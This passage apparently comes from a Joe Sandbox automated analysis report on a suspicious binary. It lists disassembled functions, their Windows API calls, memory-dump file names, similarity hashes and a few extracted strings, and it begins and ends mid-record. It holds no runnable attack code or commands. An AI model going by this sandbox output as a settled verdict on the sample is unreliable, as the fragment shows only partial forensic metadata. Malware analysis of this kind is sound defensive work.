                                                                                  • SizeofResource.KERNEL32(?,0BEAD71C,?,0BEAD71C,?,?,?,0BEA954C,?,00000001,00000000,?,0BEAD5E8,?), ref: 0BEAD6C3
                                                                                  • LockResource.KERNEL32(0BEAD3E0,00000000,?,0BEAD71C,?,0BEAD71C,?,?,?,0BEA954C,?,00000001,00000000,?,0BEAD5E8,?), ref: 0BEAD6CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID:
                                                                                  • API String ID: 3473537107-0
                                                                                  • Opcode ID: dd71b1d8c3ee8c18feb184a30f6369b2d0be762160bd6430f49bd1789277e1bd
                                                                                  • Instruction ID: 0c5a26b1a18edefb709f978b1500c7846eef144dfa65ef04ddc84f31e7ed5d50
                                                                                  • Opcode Fuzzy Hash: dd71b1d8c3ee8c18feb184a30f6369b2d0be762160bd6430f49bd1789277e1bd
                                                                                  • Instruction Fuzzy Hash: 78F0A4B36052087F4B04FE5CAC81DAB77ECDE891603505069FD0CCB205DA30ED154379
                                                                                  Function 6A6F8763 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTopWindow.USER32(?), ref: 6A6F8773
                                                                                  • GetTopWindow.USER32(00000000), ref: 6A6F87B2
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 6A6F87D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window
                                                                                  • String ID:
                                                                                  • API String ID: 2353593579-0
                                                                                  • Opcode ID: 1a99f7ebcb7ff8016dfc7be1f5621bb52340028688bdf776efd9e223c34a4470
                                                                                  • Instruction ID: 18b6413333ace153c1d073bdac508e2f087d89ff1aa09f3fa02ee0624ec9ca20
                                                                                  • Opcode Fuzzy Hash: 1a99f7ebcb7ff8016dfc7be1f5621bb52340028688bdf776efd9e223c34a4470
                                                                                  • Instruction Fuzzy Hash: D201D33210121ABBDF135E96DC45E9F3E6BAF4A360F054860FA2461071CB36C962EBA5
                                                                                  Function 6A6F811F Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 6A6F812C
                                                                                  • GetTopWindow.USER32(00000000), ref: 6A6F813F
                                                                                    • Part of subcall function 6A6F811F: GetWindow.USER32(00000000,00000002), ref: 6A6F8186
                                                                                  • GetTopWindow.USER32(?), ref: 6A6F816F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Item
                                                                                  • String ID:
                                                                                  • API String ID: 369458955-0
                                                                                  • Opcode ID: 990f5dde1885c8ed9070c860c6a815682f599c59ef309e791ee7cafd417dfeb2
                                                                                  • Instruction ID: 3979cdb96f13ce09f7ec60a5d44aea8c100ffcdd3617e59df5d5e172f3c50c88
                                                                                  • Opcode Fuzzy Hash: 990f5dde1885c8ed9070c860c6a815682f599c59ef309e791ee7cafd417dfeb2
                                                                                  • Instruction Fuzzy Hash: 45018436145617B7DF229EA78C05E8F3A6FAF42364B058A60FE1495120DF31C9138AE4
                                                                                  Function 6A6E0CB0 Relevance: 6.0, APIs: 4, Instructions: 40fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileSize.KERNEL32(?,?,?,?,?,?,6A6D184E,?), ref: 6A6E0CDA
                                                                                  • SetFilePointer.KERNEL32(00000000,-000000FC,00000000,00000001,?,?,?,?,?,?,6A6D184E,?), ref: 6A6E0CE9
                                                                                  • __aullrem.LIBCMT ref: 6A6E0CFC
                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000,?,000000FF,00000000,?,?,?,?,?,?,6A6D184E), ref: 6A6E0D1A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$PointerSizeWrite__aullrem
                                                                                  • String ID:
                                                                                  • API String ID: 2200587376-0
                                                                                  • Opcode ID: f2d9de0929714e6fc8513a1a70e298ab23dbbb3592f2966262c1dfd4dd12f787
                                                                                  • Instruction ID: 7d3592795ff1cf28b185dbe4d366109d90df7b9221ebffa7ebf9a39b054605f0
                                                                                  • Opcode Fuzzy Hash: f2d9de0929714e6fc8513a1a70e298ab23dbbb3592f2966262c1dfd4dd12f787
                                                                                  • Instruction Fuzzy Hash: 16F081710483516EE700DB64DC49BBBBBE8AF95B04F08892CF594D6181DBB8890987A3
                                                                                  Function 0BEB79A0 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteObject$Release
                                                                                  • String ID:
                                                                                  • API String ID: 2600533906-0
                                                                                  • Opcode ID: 4773f35ff4d44fa0fb45e9d4a0444aafed2083f8118080a5cb3bc32108dcd712
                                                                                  • Instruction ID: 6638943072cd24d916dd9c3b122d9df0fb6f138824b3353075a3d13c42c1d5e0
                                                                                  • Opcode Fuzzy Hash: 4773f35ff4d44fa0fb45e9d4a0444aafed2083f8118080a5cb3bc32108dcd712
                                                                                  • Instruction Fuzzy Hash: 43E06D71A54205AEEF50EBE8A843EBF73B8FB44300F405410F62086180C774AC0CC720
                                                                                  Function 0BEF4D74 Relevance: 6.0, APIs: 4, Instructions: 22windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0BEF4D84
                                                                                  • PostQuitMessage.USER32(?), ref: 0BEF4D99
                                                                                  • TranslateMessage.USER32 ref: 0BEF4DA1
                                                                                  • DispatchMessageA.USER32 ref: 0BEF4DA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekPostQuitTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 1277387291-0
                                                                                  • Opcode ID: 60412853910e960549ee3fb45b6a9daf6bfc4968fc1a9752075e530c640a76ca
                                                                                  • Instruction ID: a6c47eaf1b47f06756c6a94951d6577d148a7a74466eb4f676c16e520d23253d
                                                                                  • Opcode Fuzzy Hash: 60412853910e960549ee3fb45b6a9daf6bfc4968fc1a9752075e530c640a76ca
                                                                                  • Instruction Fuzzy Hash: C3E0C230924302BEED60BA609C03F9B31A81B40A20F8025097A04961C2EBA6D54C82A7
                                                                                  Function 0BE97BE0 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalHandle.KERNEL32 ref: 0BE97BE3
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0BE97BEA
                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0BE97BEF
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0BE97BF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocHandleLockUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 2167344118-0
                                                                                  • Opcode ID: 12c31064beb9c0d1e1d5bb3fc420e02b111f226ff6da3f7fc0f00632f81f9461
                                                                                  • Instruction ID: c7f50a2d013b2b752f583cb66f5008007b900354ab229cec363eeb8a854906da
                                                                                  • Opcode Fuzzy Hash: 12c31064beb9c0d1e1d5bb3fc420e02b111f226ff6da3f7fc0f00632f81f9461
                                                                                  • Instruction Fuzzy Hash: 07B009D49756003CAE0A73F06E0BD7B281CA8A054A395AE687820A20229A68AC4E403A
                                                                                  Function 6A6D3180 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 261COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • GetXzsDlqTypeByOurType unknow type..., xrefs: 6A6D33BE
                                                                                  • C:\pl.txt, xrefs: 6A6D33A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: C:\pl.txt$GetXzsDlqTypeByOurType unknow type...
                                                                                  • API String ID: 0-1978444376
                                                                                  • Opcode ID: e3078f2f230c083c6c644deb5ae9034c8c1d820d19df745bb47d02daf4b59a1b
                                                                                  • Instruction ID: 36eb803098ef30027ef175d3fd25feee4a728fb7260c0a7521225e266dd5353d
                                                                                  • Opcode Fuzzy Hash: e3078f2f230c083c6c644deb5ae9034c8c1d820d19df745bb47d02daf4b59a1b
                                                                                  • Instruction Fuzzy Hash: 6D517993F0907066EA5420CCB990688D311838ABF3F761CBBE65ADB6A1EF45CC9553C1
                                                                                  Function 6A6EDC40 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 215COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 6A6EDC98
                                                                                    • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
                                                                                    • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
                                                                                    • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap_malloc
                                                                                  • String ID: %1s
                                                                                  • API String ID: 3293231637-3465968173
                                                                                  • Opcode ID: 23a560e7da4a6c7b76c7fad7ccc91b2c2e4ba5261362cb5a41557ae83a64ddfc
                                                                                  • Instruction ID: 1b57ccba48a9db6b390da0785425beb65d59beed7dd85faaeb10b9688dfafafa
                                                                                  • Opcode Fuzzy Hash: 23a560e7da4a6c7b76c7fad7ccc91b2c2e4ba5261362cb5a41557ae83a64ddfc
                                                                                  • Instruction Fuzzy Hash: 7771E2B150D341DBD710CF64C884AABB7F6BBCA314F06492DE8988B341EF31E9068796
                                                                                  Function 6A6ED640 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 171COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
